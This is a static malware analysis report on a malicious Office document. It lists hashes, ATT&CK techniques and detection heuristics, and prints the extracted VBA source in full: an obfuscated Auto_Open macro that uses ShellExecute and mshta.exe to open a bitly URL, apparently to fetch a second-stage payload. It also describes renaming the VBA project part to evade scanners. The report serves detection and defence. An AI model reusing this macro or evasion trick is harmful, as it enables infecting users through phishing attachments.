Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e61195d0d4b89753…

MALICIOUS

Office (OOXML)

7.7 KB First seen: 2021-06-28
MD5: 4d58c3443bffb1aa7190282a9f7ad8bc SHA-1: e3c381f549c03ab684f9c7fa5b78a1cfae1d8ce0 SHA-256: e61195d0d4b897536f0cc090d36140099db443b5b913894d13cd76f7abee36b6
68 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a macro-enabled Office document containing an Auto_Open VBA macro. This macro reconstructs the string "mshta" and uses the ShellExecute API to open the URL "http://www.bitly.com/hwdinnwshdwdwqwhda" with the mshta.exe interpreter, likely to download and execute a second-stage payload. The VBA project part was renamed to evade detection.

Heuristics 3

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/asjdajdoawdoajwd.bin)
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub _
    Auto_Open _
    ()

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1082 bytes
SHA-256: 817a9dbeaaa9364c93657dabbb744ed2aaffd1239c48dd68da7e4a5d2df47b0b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Const _
SW_SHOW _
= _
1
Const _
SW_SHOWMAXIMIZED _
= _
3

Public _
Declare _
Function _
ShellExecute _
Lib _
"Shell32.dll" _
Alias _
"ShellExecuteA" _
  (ByVal _
  hwnd _
  As _
  Long _
  , _
   ByVal _
   lpOperation _
   As _
   String _
   , _
   ByVal lpFile As String _
   , _
   ByVal lpParameters As String _
   , _
   ByVal lpDirectory As String _
   , _
   ByVal nShowCmd As Long) As Long
Function koko()



koko _
= _
"m" _
+ _
"s" _
+ _
"h" _
+ _
"t" _
+ _
"a"
End _
Function
Sub _
Auto_Open _
()
  Dim _
  RetVal _
  As _
  Long
  On _
  Error _
  Resume _
  Next
  RetVal _
  = _
  ShellExecute _
  (0, "open", koko, "h" _
  + _
  "t" _
  + _
  "t" _
  + _
  "p" _
  + _
  ":" _
  + _
  "/" _
  + _
  "/" _
  + _
  "w" _
  + _
  "w" _
  + "w" + "." + "b" + "i" + "t" + "l" + "y" + "." + "c" + "o" + "m/hwdinnwshdwdwqwhda", _
                        "%public%" _
                        , _
                        SW_SHOWMinimize)
End Sub
vbaProject_00.bin vba-project OOXML VBA project: ppt/asjdajdoawdoajwd.bin 14336 bytes
SHA-256: db1ca81719d617cc08b00e02cbfa5f5681ab2e2c6cb27765b86dbf9707e24e33